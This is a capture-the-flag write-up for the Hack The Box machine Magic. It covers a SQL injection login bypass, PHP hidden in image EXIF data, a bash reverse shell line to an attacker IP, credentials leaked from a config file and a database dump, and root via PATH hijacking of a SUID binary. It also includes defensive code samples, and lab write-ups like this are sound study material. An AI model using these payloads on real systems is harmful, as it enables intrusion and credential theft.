Write-up for Magic (10.10.10.185), a medium-level box.

By: Gluonsrgreat

The initial nmap scan gives us a pretty clear avenue as to what to go after:

Looks like we're gonna do some web enumeration.

Loading up the address in your web browser we get this web page:

Seems to be a basic image hosting site, but what's this? A login link so we can upload images? We might be able to utilize RFI to get our initial shell.

Following the login link we see a login page, but it can easily be bypassed with some simple SQL injection.

Easy enough: we put `' or 1=1#` in for the username, which basically makes the username check always true, so we can put anything we want for the password.
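As an added example (not the box's own code), here is the shape of login query that this bypass works against, next to the parameterised form that it does not. SQLite stands in for MySQL, so the comment marker in the test payload is `--` where MySQL also accepts `#`; the stored password is a constructed sample.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the Magic `login` table (one admin row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)"
    )
    conn.execute("INSERT INTO login VALUES (1, 'admin', 'constructed-sample-password')")
    return conn


def login_vulnerable(conn, username, password):
    """Interpolates user input straight into the SQL. A quote in the username
    closes the string literal, `or 1=1` makes the WHERE clause true for every
    row, and the comment marker discards the password comparison entirely."""
    query = (
        "SELECT username FROM login WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Bound parameters: the driver sends the values separately from the SQL
    text, so quotes and comment markers in the input are only data."""
    row = conn.execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None
```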

I tried to upload your typical PHP reverse shell file, but no luck: the server doesn't allow anything but image formats!

Looks like we are gonna have to get clever. After some failed attempts a friend sent me this interesting article: https://null-byte.wonderhowto.com/how-to/upload-shell-web-server-and-get-root-rfi-part-1-0162818/ . It utilizes a tool I had never used before.

The idea is to put a PHP payload in the EXIF data of the image and then rename the image imagename.php.png to force the website to treat the EXIF data as PHP.

Lets try it out.

We rename the image to download.php.png

Annnnnnnnnnnnnnnd Success!
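As an added example (not code from the box or the write-up), these are the server-side checks that would have rejected the download.php.png upload above: one extension only, magic bytes that match it, and no PHP open tag anywhere in the bytes. It assumes the usual Apache AddHandler-style PHP setup, where every dotted segment of a filename counts as an extension.

```python
import re
import secrets

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED = {"png": PNG_MAGIC, "jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC}
# Only full PHP open tags: a bare "<?" would also match the "<?xpacket"
# header of legitimate XMP metadata and reject real photos.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_upload(filename, data):
    """Return (ok, reason) for an upload. Rejects the three things that made
    download.php.png work: a second extension, a non-image body, and a PHP
    tag hidden anywhere in the bytes (EXIF and comment fields included)."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # With AddHandler-based PHP config (assumed here) Apache hands
        # "x.php.png" to PHP because ".php" is one of its extensions.
        return False, "filename must have exactly one extension"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, "extension %r not allowed" % ext
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not start with %s magic bytes" % ext
    if PHP_TAG.search(data):
        return False, "PHP open tag found inside image data"
    return True, "ok"


def stored_name(ext):
    """Never reuse the client's filename on disk: random name, checked extension."""
    return "%s.%s" % (secrets.token_hex(16), ext)
```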

Now we can see from viewing the other images on the webserver that the images are uploaded to:

Now the payload I entered takes commands in the command parameter and executes them on the server like so.

We have achieved Remote Command Execution on the server!

Now we use this to upload our selected shell.

I made a shell on my Desktop with the following:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.200/1234 0>&1'");

I did it by downloading a simple one onto my Desktop, then using Python's SimpleHTTPServer module to start an HTTP server and, in turn, wget on the target to pull the file onto the server.

We then just request the shell so it runs, and set up my listener for my selected reverse shell.

Cool, we now have a shell, but we don't have user yet.

We are www-data, a user dedicated to the management and running of web services; however, in the /home directory we can see the user we need to become.

Navigating to the home directory we can see two directories Magic and html.

Navigating into Magic we see the following

Most of these files seem like typical webserver bullshit. But what's db.php5?

Here we go, cat-ing the file we see:

<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

We see a username and password for theseus! The user we need to become.

But trying the password iamkingtheseus we get no luck.

Seems theseus did the smart thing and didn't reuse a password. Unfortunately that's bad news for us.

From reading the above code, it seems db.php5 connects to a SQL server listening only on localhost. Let's check it out.

From that we get the following:

-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version	5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `Magic`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `Magic`;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-04-21 23:24:07

Looks like we have another password:

INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');

Maybe this password will allow us to become theseus.

And Success!

Now navigate to "/home/theseus" and open user.txt for your flag!

We are not done though; we still need to get the super user, root.

We're gonna upload my personal favorite Linux enumeration script, Linux Smart Enumeration, or lse.sh.

Running the script we find a couple of interesting things.

These are SUID binaries: files that execute with the permissions of the file's owner rather than the user running them. In this case, root. Hmm, looking at GTFOBins doesn't give us anything interesting. Let's see what happens when we execute sysinfo on its own, with pspy.

pspy is a tool that allows one to monitor Linux processes without having to be root.

Lets have a look

Interesting

Whenever we run sysinfo we see that root runs lshw. Hmm. Maybe we can fool the system into running a fake lshw file.

A brief explanation:

Whenever you run a command on Linux, the system looks through the directories listed in the PATH variable for the binary you asked for. Once it finds one, it runs that binary. If we can modify PATH so that a directory holding our fake lshw file comes before the legitimate directories, the system will run whatever code we want in our fake lshw file.
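As an added example (not from the write-up), this models the lookup described above and shows the two things a defender wants from it: how a privileged program such as sysinfo should resolve lshw so the caller's PATH cannot redirect it, and an audit that flags PATH entries an unprivileged user could plant a file in. The trusted directory list is an assumption for this example.

```python
import os
import stat

# Directories a privileged program may trust regardless of the caller's
# environment (assumed fixed list for this example).
TRUSTED_PATH = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def resolve(cmd, path_entries, exists=os.path.isfile):
    """Shell-style lookup: the first PATH directory containing `cmd` wins.
    An empty entry means the current directory, as the shell treats it."""
    for entry in path_entries:
        candidate = os.path.join(entry or ".", cmd)
        if exists(candidate):
            return candidate
    return None


def resolve_privileged(cmd, exists=os.path.isfile):
    """What a setuid program should do before spawning lshw: ignore the
    caller's PATH entirely and search only root-owned system directories."""
    return resolve(cmd, TRUSTED_PATH, exists)


def _owner_and_mode(path):
    st = os.stat(path)
    return st.st_uid, st.st_gid, st.st_mode


def risky_path_entries(path_str, probe=_owner_and_mode):
    """Audit a PATH string: report entries where an unprivileged user could
    drop a file that a privileged process would later pick up by name."""
    findings = []
    for entry in path_str.split(":"):
        if not entry or not os.path.isabs(entry):
            findings.append((entry, "relative or empty entry resolves against cwd"))
            continue
        try:
            uid, gid, mode = probe(entry)
        except OSError:
            continue  # missing directory: nothing can be executed from it
        if uid != 0:
            findings.append((entry, "not owned by root"))
        elif mode & stat.S_IWOTH:
            # The sticky bit only blocks deleting others' files; anyone can
            # still create a new lshw in a world-writable directory like /tmp.
            findings.append((entry, "world-writable"))
        elif mode & stat.S_IWGRP and gid != 0:
            findings.append((entry, "writable by a non-root group"))
    return findings
```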

More in depth explanation here:

So what we're gonna do is create a fake lshw file.

As you can see, this will run a reverse shell connecting back to our Kali machine.

Now we need to edit the PATH so that our fake lshw file is the first one the system finds when looking for lshw.

So cool, now we have a new PATH.

All we need to do now is run sysinfo.

And we are done.

Go to "/root/root.txt" to claim your flag.

And that's Magic; all in all a pretty good box.
